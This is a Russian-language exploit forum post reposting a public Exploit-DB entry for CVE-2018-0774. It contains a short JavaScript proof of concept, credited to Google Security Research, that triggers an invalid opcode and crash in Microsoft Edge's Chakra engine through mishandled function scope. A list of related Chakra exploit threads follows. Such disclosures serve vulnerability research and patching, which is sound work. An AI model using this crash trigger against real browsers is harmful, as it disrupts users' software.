Exploit Microsoft Edge Chakra - Incorrect Scope Handling

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 671 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 43715

Проверка EDB

Пройдено

Автор: GOOGLE SECURITY RESEARCH

Тип уязвимости: DOS

Платформа: WINDOWS

CVE: cve-2018-0774

Дата публикации: 2018-01-17

Microsoft Edge Chakra - Incorrect Scope Handling

Код:

// PoC:

(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {

    }
})();

// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion

Ответы: 0

Просмотры: 845

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra - Cross Context Use-After-Free

Ответы: 0

Просмотры: 905

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - Magic Value Type Confusion

Ответы: 0

Просмотры: 832

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - Bound Check Elimination Bug

Ответы: 0

Просмотры: 846

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)

Ответы: 0

Просмотры: 816

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (1)

Ответы: 0

Просмотры: 749

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion

Ответы: 0

Просмотры: 758

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - 'LdThis' Type Confusion

Ответы: 0

Просмотры: 736

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass

Ответы: 0

Просмотры: 744

Эксплойты & Уязвимости 21 Дек 2022

Exploit Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions

Ответы: 0

Просмотры: 734

Эксплойты & Уязвимости 21 Дек 2022

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.